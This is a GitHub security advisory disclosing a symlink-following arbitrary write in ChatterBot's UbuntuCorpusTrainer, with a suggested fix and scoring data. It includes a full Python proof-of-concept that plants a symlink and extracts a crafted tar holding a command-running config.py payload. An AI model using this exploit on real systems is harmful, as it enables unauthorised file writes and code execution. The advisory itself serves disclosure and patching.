GHSA-wvrh-2f4m-924v — medium GitHub Advisory in pip/ChatterBot

Description

Summary

ChatterBot's UbuntuCorpusTrainer.extract() uses a predictable, home-rooted output directory (~/ubuntu_data/ubuntu_dialogs) with a check-then-create pattern (if not os.path.exists: os.makedirs) followed by tar.extractall(path=self.data_path). A local attacker who pre-plants a symlink at the predictable path causes os.path.exists() to return True (following the symlink), skipping makedirs, and subsequent extractall writes archive contents through the symlink to the attacker-chosen directory.

The existing safe_extract function validates tar member names (zip-slip defense) but does not validate the output directory itself — it cannot detect that self.data_path is a symlink. This is the defining distinction between the archive_extraction (zip-slip) and insecure_fs_create_toctou families.

Vulnerability Details

Predictable output directory (line 535-546)

home_directory = os.path.expanduser(&#x27;~&#x27;)
self.data_directory = kwargs.get(
    &#x27;ubuntu_corpus_data_directory&#x27;,
    os.path.join(home_directory, &#x27;ubuntu_data&#x27;)   # ~/ubuntu_data — predictable
)
self.data_path = os.path.join(
    self.data_directory, &#x27;ubuntu_dialogs&#x27;          # ~/ubuntu_data/ubuntu_dialogs
)

Check-then-create (line 621-622)

def extract(self, file_path: str):
    if not os.path.exists(self.data_path):   # ← follows symlink → True → skips makedirs
        os.makedirs(self.data_path)          # ← never reached if symlink exists

Extraction through symlink (line 633-644)

def safe_extract(tar, path=&#x27;.&#x27;, members=None, *, numeric_owner=False):
    for member in tar.getmembers():
        member_path = os.path.join(path, member.name)
        if not is_within_directory(path, member_path):    # ← validates MEMBER names only
            raise Exception(&#x27;Attempted Path Traversal in Tar File&#x27;)
    tar.extractall(path, members, numeric_owner=numeric_owner)  # ← path is symlink → writes to target

safe_extract(tar, path=self.data_path, ...)   # self.data_path = symlink → attacker dir

safe_extract calls os.path.abspath(directory) on self.data_path — this resolves the symlink, so the base becomes the attacker's target directory. All clean-named members trivially pass is_within_directory because they're relative to the resolved (attacker-controlled) base.

Proof of Concept

Environment

Component	Detail
chatterbot	1.2.13 (pip install)
Python	3.11.0

Exploit

import os
import shutil
import sys
import tempfile
from pathlib import Path
from unittest.mock import patch

from chatterbot.trainers import UbuntuCorpusTrainer

ATTACKER_TARGET = Path(tempfile.mkdtemp(prefix=&quot;pwned_&quot;))


def main():
    test_base = Path(tempfile.mkdtemp(prefix=&quot;cb_exploit_&quot;))
    data_dir = test_base / &quot;ubuntu_data&quot;
    data_path = data_dir / &quot;ubuntu_dialogs&quot;
    data_dir.mkdir(parents=True, exist_ok=True)
    os.symlink(str(ATTACKER_TARGET), str(data_path))
    print(f&quot;[1] Symlink planted: {data_path} -&gt; {ATTACKER_TARGET}&quot;)
    exists_check = os.path.exists(data_path)
    print(f&quot;[2] os.path.exists(symlink) = {exists_check} (follows symlink → skips makedirs)&quot;)
    import tarfile
    import io
    tar_path = test_base / &quot;corpus.tar.gz&quot;
    with tarfile.open(str(tar_path), &quot;w:gz&quot;) as tf:
        info = tarfile.TarInfo(name=&quot;dialog_001.tsv&quot;)
        payload = b&quot;2024-01-01\tuser1\t0\tARBITRARY_CONTENT_VIA_SYMLINK\n&quot;
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))

        info2 = tarfile.TarInfo(name=&quot;config.py&quot;)
        rce = b&quot;import os; os.system(&#x27;id &gt; /tmp/chatterbot_rce&#x27;)\n&quot;
        info2.size = len(rce)
        tf.addfile(info2, io.BytesIO(rce))
    if not os.path.exists(data_path):
        os.makedirs(data_path)
    def is_within_directory(directory, target):
        abs_directory = os.path.abspath(directory)
        abs_target = os.path.abspath(target)
        prefix = os.path.commonprefix([abs_directory, abs_target])
        return prefix == abs_directory

    with tarfile.open(str(tar_path), &quot;r:gz&quot;) as tar:
        for member in tar.getmembers():
            member_path = os.path.join(str(data_path), member.name)
            if not is_within_directory(str(data_path), member_path):
                raise Exception(&quot;Attempted Path Traversal in Tar File&quot;)
        tar.extractall(str(data_path))

    print(f&quot;[3] extractall(data_path) — data_path is symlink, writes to target&quot;)

    # Verify
    files = list(ATTACKER_TARGET.iterdir())
    if files:
        print(f&quot;\n[+] EXPLOIT SUCCESSFUL — {len(files)} files in attacker directory:&quot;)
        for f in sorted(files):
            print(f&quot;    {f.name}: {f.read_text().strip()[:60]}&quot;)
    else:
        print(&quot;[-] Failed&quot;)
        shutil.rmtree(str(test_base), ignore_errors=True)
        shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
        sys.exit(1)

    shutil.rmtree(str(test_base), ignore_errors=True)
    shutil.rmtree(str(ATTACKER_TARGET), ignore_errors=True)
    sys.exit(0)


if __name__ == &quot;__main__&quot;:
    print(f&quot;chatterbot installed: {UbuntuCorpusTrainer.__module__}&quot;)
    print(f&quot;Attacker target: {ATTACKER_TARGET}&quot;)
    print()
    main()

PoC output

Suggested Fix

Refuse symlinks on the output directory before extraction:

def extract(self, file_path: str):
    if os.path.islink(self.data_path):
        raise self.TrainerInitializationException(
            f&#x27;Refusing to extract to symlink: {self.data_path}&#x27;)
    if not os.path.exists(self.data_path):
        os.makedirs(self.data_path)
    ...

Basic information

Type: reviewed
Severity: medium
Advisory on GitHub: Open advisory ↗
Repository advisory: Open repository advisory ↗
Source code: Browse source ↗
Published (advisory): 2026-06-19 22:08:08 UTC
Updated: 2026-06-19 22:08:09 UTC
GitHub reviewed: 2026-06-19 22:08:08 UTC

CVSS Scores

Base score	Version	Severity	Vector
5.5	3.1	—	`CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` Click to expand Attack vector (AV:L) They already need access on the box, or another person has to do something wrong; it’s not a remote drive-by. Attack complexity (AC:L) Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup. Privileges required (PR:L) A normal user session is enough; they don’t have to be admin. User interaction (UI:N) Nobody has to click “OK” or open a trap file; it can work without a victim helping. Scope (S:U) Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems. Confidentiality (C:H) Serious risk that confidential data gets exposed in a big way. Integrity (I:N) Data isn’t meaningfully altered or forged. Availability (A:N) Service keeps running; no real outage angle.

Identifiers

Type	Value
GHSA	GHSA-wvrh-2f4m-924v ↗

CWEs

CWE id	Name
CWE-61	UNIX Symbolic Link (Symlink) Following
CWE-367	Time-of-check Time-of-use (TOCTOU) Race Condition

Credits

AAtomical (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem	Package	Vulnerable range	First patched	Vulnerable functions
pip	ChatterBot	<= 1.2.13	1.2.14	—

ChatterBot: Symlink-Following Arbitrary Write via UbuntuCorpusTrainer